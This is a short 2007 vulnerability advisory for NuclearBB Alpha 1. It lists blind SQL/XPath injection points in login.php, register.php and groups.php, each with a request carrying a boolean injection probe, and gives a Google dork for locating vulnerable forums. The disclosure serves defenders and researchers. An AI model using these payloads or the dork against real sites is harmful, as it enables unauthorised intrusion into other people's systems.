NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities Vulnerable: NuclearBB Alpha 1 Google d0rk: "This forum is powered by NuclearBB" ============= String Inputs ============= ---------------------------- login.php - $_POST['submit'] ---------------------------- username=xyz password=passxyz submit=Login"+and+"1"="0 -------------------------------- register.php - $_POST['website'] -------------------------------- username=xyz@xxxxxxx email=xyz@xxxxxxx pass1=passwordxyz pass2=passwordxyz website=xyz@xxxxxxx"+and+"1"="0 location=xyz@xxxxxxx msn=xyz@xxxxxxx yahoo=xyz@xxxxxxx aol=xyz@xxxxxxx icq=xyz@xxxxxxx signature=xyz@xxxxxxx coppa_state=over register_submit=Register ---------------------------- register.php - $_POST['aol'] ---------------------------- username=xyz@xxxxxxx email=xyz@xxxxxxx pass1=xyz@xxxxxxx pass2=xyz@xxxxxxx website=xyz@xxxxxxx location=xyz@xxxxxxx msn=xyz@xxxxxxx yahoo=xyz@xxxxxxx aol=xyz@xxxxxxx"+and+"1"="0 icq=xyz@xxxxxxx signature=xyz@xxxxxxx coppa_state=over register_submit=Register ---------------------------------- register.php - $_POST['signature'] ---------------------------------- username=xyz@xxxxxxx email=xyz@xxxxxxx pass1=xyz@xxxxxxx pass2=xyz@xxxxxxx website=xyz@xxxxxxx location=xyz@xxxxxxx msn=xyz@xxxxxxx yahoo=xyz@xxxxxxx aol=xyz@xxxxxxx icq=xyz@xxxxxxx signature=xyz@xxxxxxx"+and+"1"="0 coppa_state=over register_submit=Register ============== Numeric Inputs ============== ----------------------- groups.php - $_GET['g'] ----------------------- http://www.example.com/groups.php?g=1+and+1=0 ------------------------------ register.php - $_POST['email'] ------------------------------ username=xyz@xxxxxxx email=xyz@xxxxxxx+and+1=0 pass1=xyz@xxxxxxx pass2=xyz@xxxxxxx website=xyz@xxxxxxx location=xyz@xxxxxxx msn=xyz@xxxxxxx yahoo=xyz@xxxxxxx aol=xyz@xxxxxxx icq=xyz@xxxxxxx signature=xyz@xxxxxxx coppa_state=over®ister_submit=Register John Martinelli john@xxxxxxxxxxxxxx http://john-martinelli.com April 18th, 2007
